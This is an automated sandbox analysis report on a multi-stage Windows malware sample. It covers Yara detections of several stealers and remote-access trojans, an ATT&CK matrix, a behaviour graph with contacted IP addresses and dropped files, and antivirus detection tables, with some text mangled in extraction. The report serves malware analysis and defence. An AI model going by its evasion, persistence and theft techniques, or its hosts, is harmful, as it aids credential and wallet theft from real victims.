                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\XQACHMZIHU
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\XQACHMZIHU
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGG
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGG
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGG
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGG
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIK
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\MQAWXUYAIK
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSD
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSD
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWP
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWP
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\XQACHMZIHU
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\XQACHMZIHU
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGG
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGG
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\XQACHMZIHU
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\XQACHMZIHU
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKO
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeDirectory queried: number of queries: 1001
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeDirectory queried: number of queries: 1001
                                Source: Yara matchFile source: 0000005F.00000003.2934600615.0000000001328000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000054.00000003.2941270961.0000000001355000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000005F.00000003.2934892594.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000054.00000003.2940333141.0000000001302000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000005F.00000003.2960705475.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000054.00000003.2942245341.000000000135B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000054.00000003.2941333004.0000000001302000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: D1UL0FG.exe PID: 6716, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: 8ZVMneG.exe PID: 7744, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: d0ef52de9f.exe PID: 7216, type: MEMORYSTR

                                Remote Access Functionality

                                barindex
                                Yara detected Blank Grabber
                                Source: Yara matchFile source: 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2986166870.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.2469304797.0000027326167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.2469304797.0000027326165000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2992431014.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2983797651.000001FA2EDC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: D1UL0FG.exe PID: 5160, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: D1UL0FG.exe PID: 6716, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI51602\rarreg.key, type: DROPPED
                                Yara detected LummaC Stealer
                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: 8ZVMneG.exe PID: 7744, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: d0ef52de9f.exe PID: 7216, type: MEMORYSTR
                                Yara detected PureLog Stealer
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1017914001\db75e03f4b.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe, type: DROPPED
                                Yara detected Telegram RAT
                                Source: Yara matchFile source: Process Memory Space: D1UL0FG.exe PID: 6716, type: MEMORYSTR
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006BEC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,3_2_006BEC48
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006BDF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,3_2_006BDF51
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8752B62 bind,WSAGetLastError,6_2_00007FF8A8752B62
                                Source: Yara matchFile source: 85.2.FuturreApp.exe.920000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 85.2.FuturreApp.exe.6bfe0000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 81.3.m9sfEU9.exe.31f4800.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 85.0.FuturreApp.exe.920000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 85.2.FuturreApp.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 85.2.FuturreApp.exe.6c000000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 85.2.FuturreApp.exe.6bd30000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 85.2.FuturreApp.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000055.00000000.2642607921.0000000000922000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000055.00000002.7287032107.00000000111E1000.00000004.00000001.01000000.00000023.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000055.00000002.7276259050.0000000000922000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: m9sfEU9.exe PID: 7732, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: FuturreApp.exe PID: 1972, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\Public\Netstat\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\FuturreApp.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
                                Windows Management Instrumentation                                		1
                                DLL Side-Loading                                		1
                                DLL Side-Loading                                		1
                                File and Directory Permissions Modification                                		2
                                OS Credential Dumping                                		2
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		1
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                Data Encrypted for Impact
                                CredentialsDomainsDefault Accounts12
                                Native API                                		1
                                Scheduled Task/Job                                		112
                                Process Injection                                		4
                                Disable or Modify Tools                                		LSASS Memory23
                                File and Directory Discovery                                		Remote Desktop Protocol41
                                Data from Local System                                		1
                                Encrypted Channel                                		Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts222
                                Command and Scripting Interpreter                                		121
                                Registry Run Keys / Startup Folder                                		1
                                Scheduled Task/Job                                		21
                                Deobfuscate/Decode Files or Information                                		Security Account Manager247
                                System Information Discovery                                		SMB/Windows Admin Shares1
                                Clipboard Data                                		1
                                Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts1
                                Scheduled Task/Job                                		Login Hook121
                                Registry Run Keys / Startup Folder                                		4
                                Obfuscated Files or Information                                		NTDS10101
                                Security Software Discovery                                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts4
                                PowerShell                                		Network Logon ScriptNetwork Logon Script14
                                Software Packing                                		LSA Secrets3
                                Process Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                Timestomp                                		Cached Domain Credentials471
                                Virtualization/Sandbox Evasion                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                DLL Side-Loading                                		DCSync1
                                Application Window Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                                Masquerading                                		Proc Filesystem1
                                Remote System Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                                Modify Registry                                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron471
                                Virtualization/Sandbox Evasion                                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd112
                                Process Injection                                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1578555 Sample: file.exe Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 142 Found malware configuration 2->142 144 Antivirus detection for dropped file 2->144 146 Antivirus / Scanner detection for submitted sample 2->146 148 25 other signatures 2->148 12 file.exe 5 2->12         started        16 skotes.exe 2->16         started        18 skotes.exe 2->18         started        process3 file4 116 C:\Users\user\AppData\Local\...\skotes.exe, PE32 12->116 dropped 118 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 12->118 dropped 208 Detected unpacking (changes PE section rights) 12->208 210 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 12->210 212 Tries to evade debugger and weak emulator (self modifying code) 12->212 214 Tries to detect virtualization through RDTSC time measurements 12->214 20 skotes.exe 4 89 12->20         started        216 Hides threads from debuggers 16->216 218 Tries to detect sandboxes / dynamic malware analysis system (registry check) 16->218 220 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 16->220 signatures5 process6 dnsIp7 120 185.215.113.43 WHOLESALECONNECTIONSNL Portugal 20->120 122 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 20->122 124 31.41.244.11 AEROEXPRESS-ASRU Russian Federation 20->124 92 C:\Users\user\AppData\...\85070a414c.exe, PE32 20->92 dropped 94 C:\Users\user\AppData\...\194df6b68b.exe, PE32 20->94 dropped 96 C:\Users\user\AppData\...\b8dc7af2d8.exe, PE32 20->96 dropped 98 43 other malicious files 20->98 dropped 178 Uses cmd line tools excessively to alter registry or file data 20->178 180 Creates multiple autostart registry keys 20->180 182 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 20->182 184 3 other signatures 20->184 25 D1UL0FG.exe 22 20->25         started        29 d188864e84.exe 20->29         started        32 m9sfEU9.exe 20->32         started        34 2 other processes 20->34 file8 signatures9 process10 dnsIp11 100 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 25->100 dropped 102 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 25->102 dropped 104 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 25->104 dropped 112 16 other files (15 malicious) 25->112 dropped 186 Antivirus detection for dropped file 25->186 188 Modifies Windows Defender protection settings 25->188 190 Adds a directory exclusion to Windows Defender 25->190 204 2 other signatures 25->204 36 D1UL0FG.exe 1 108 25->36         started        140 172.67.180.113 CLOUDFLARENETUS United States 29->140 192 Multi AV Scanner detection for dropped file 29->192 194 Detected unpacking (changes PE section rights) 29->194 196 Query firmware table information (likely to detect VMs) 29->196 206 8 other signatures 29->206 106 C:\Users\Public106etstat\remcmdstub.exe, PE32 32->106 dropped 108 C:\Users\Public108etstat\pcicapi.dll, PE32 32->108 dropped 110 C:\Users\Public110etstat\TCCTL32.DLL, PE32 32->110 dropped 114 5 other files (4 malicious) 32->114 dropped 40 FuturreApp.exe 32->40         started        42 Conhost.exe 32->42         started        198 Uses cmd line tools excessively to alter registry or file data 34->198 200 Injects a PE file into a foreign processes 34->200 202 LummaC encrypted strings found 34->202 44 8ZVMneG.exe 34->44         started        46 d0ef52de9f.exe 34->46         started        48 conhost.exe 34->48         started        50 2 other processes 34->50 file12 signatures13 process14 dnsIp15 126 208.95.112.1 TUT-ASUS United States 36->126 128 149.154.167.220 TELEGRAMRU United Kingdom 36->128 130 172.217.19.227 GOOGLEUS United States 36->130 164 Found many strings related to Crypto-Wallets (likely being stolen) 36->164 166 Tries to harvest and steal browser information (history, passwords, etc) 36->166 168 Modifies Windows Defender protection settings 36->168 176 5 other signatures 36->176 52 cmd.exe 36->52         started        55 cmd.exe 36->55         started        57 cmd.exe 36->57         started        59 24 other processes 36->59 132 185.215.113.64 WHOLESALECONNECTIONSNL Portugal 40->132 134 172.67.68.212 CLOUDFLARENETUS United States 40->134 170 Multi AV Scanner detection for dropped file 40->170 138 4 other IPs or domains 44->138 172 Query firmware table information (likely to detect VMs) 44->172 174 Tries to steal Crypto Currency Wallets 44->174 136 104.21.23.76 CLOUDFLARENETUS United States 46->136 signatures16 process17 signatures18 150 Suspicious powershell command line found 52->150 152 Uses cmd line tools excessively to alter registry or file data 52->152 154 Encrypted powershell cmdline option found 52->154 162 4 other signatures 52->162 61 powershell.exe 52->61         started        64 conhost.exe 52->64         started        156 Modifies Windows Defender protection settings 55->156 158 Adds a directory exclusion to Windows Defender 55->158 66 powershell.exe 55->66         started        77 2 other processes 55->77 68 powershell.exe 57->68         started        71 conhost.exe 57->71         started        160 Tries to harvest and steal WLAN passwords 59->160 73 getmac.exe 59->73         started        75 powershell.exe 59->75         started        79 46 other processes 59->79 process19 file20 222 Loading BitLocker PowerShell Module 61->222 88 C:\Users\user\AppData\...\l2sopuet.cmdline, Unicode 68->88 dropped 81 csc.exe 68->81         started        224 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 73->224 226 Writes or reads registry keys via WMI 73->226 90 C:\Users\user\AppData\Local\Temp\vLqBW.zip, RAR 79->90 dropped signatures21 process22 file23 86 C:\Users\user\AppData\Local\...\l2sopuet.dll, PE32 81->86 dropped 84 cvtres.exe 81->84         started        process24

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                file.exe47%ReversingLabsWin32.Infostealer.Tinba
                                file.exe100%AviraTR/Crypt.TPM.Gen
                                file.exe100%Joe Sandbox ML

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exe100%AviraTR/Crypt.TPM.Gen
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\UZAj8wc[1].exe100%AviraTR/Dropper.Gen
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe100%AviraTR/Crypt.TPM.Gen
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[5].exe100%AviraHEUR/AGEN.1320706
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\D1UL0FG[1].exe100%AviraHEUR/AGEN.1306040
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exe100%AviraTR/Crypt.XPACK.Gen
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe100%AviraTR/Crypt.XPACK.Gen
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe100%AviraTR/Crypt.TPM.Gen
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe100%AviraTR/Crypt.XPACK.Gen
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe100%AviraTR/ATRAPS.Gen
                                C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe100%AviraHEUR/AGEN.1306040
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\UZAj8wc[1].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[5].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\8ZVMneG[1].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe100%Joe Sandbox ML
                                C:\Users\Public\Netstat\FuturreApp.exe29%ReversingLabsWin32.Trojan.NetSupport
                                C:\Users\Public\Netstat\HTCTL32.DLL3%ReversingLabs
                                C:\Users\Public\Netstat\PCICHEK.DLL3%ReversingLabs
                                C:\Users\Public\Netstat\PCICL32.DLL12%ReversingLabs
                                C:\Users\Public\Netstat\TCCTL32.DLL3%ReversingLabs
                                C:\Users\Public\Netstat\msvcr100.dll0%ReversingLabs
                                C:\Users\Public\Netstat\pcicapi.dll3%ReversingLabs
                                C:\Users\Public\Netstat\remcmdstub.exe13%ReversingLabs
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\m9sfEU9[1].exe53%ReversingLabsWin32.PUA.NetSupportRAT
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe81%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe54%ReversingLabsWin32.Trojan.Amadey
